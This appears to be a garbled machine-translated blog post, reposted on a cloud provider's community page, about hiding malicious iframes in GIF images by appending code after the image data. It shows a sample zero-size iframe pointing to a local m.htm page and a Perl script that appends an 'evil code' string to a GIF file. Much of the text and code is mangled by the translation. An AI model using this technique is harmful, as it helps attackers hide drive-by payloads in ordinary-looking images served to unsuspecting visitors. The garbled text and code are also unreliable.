What is the recent trend of Trojan horse mounting in GIF images?

Source: Internet
Author: User

Recently, several Trojan stations are found to have all mounted horses in the picture. Images in gif file format are appended to the image

The code is still displayed normally.

"Why? Listen 7? ? {D shoes; parameter; <iframe src = http: // 127.0.0.1/m.htm width = 0 height = 0> </iframe>"

Using a hexadecimal editor to edit, delete, or add images does not affect the image.

I still don't know about the gif file format. I will talk about it later when I am lazy.

==============^Xti9er ==================

#! Perl-w

My $ file = shift | die "Need file! ";
My $ ev = "edevil code ";
Open (OLD, "$ file") or die $ !;
Binmode (OLD );
Open (NEW, "> g.gif") or die $ !;
Binmode (NEW );
While (read (OLD, $ char, 1024 )){
Print NEW "$ char ";
}
Print NEW $ ev;
Close OLD;
Close NEW;

==============^Xti9er ==================

Write a code to implement this function.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.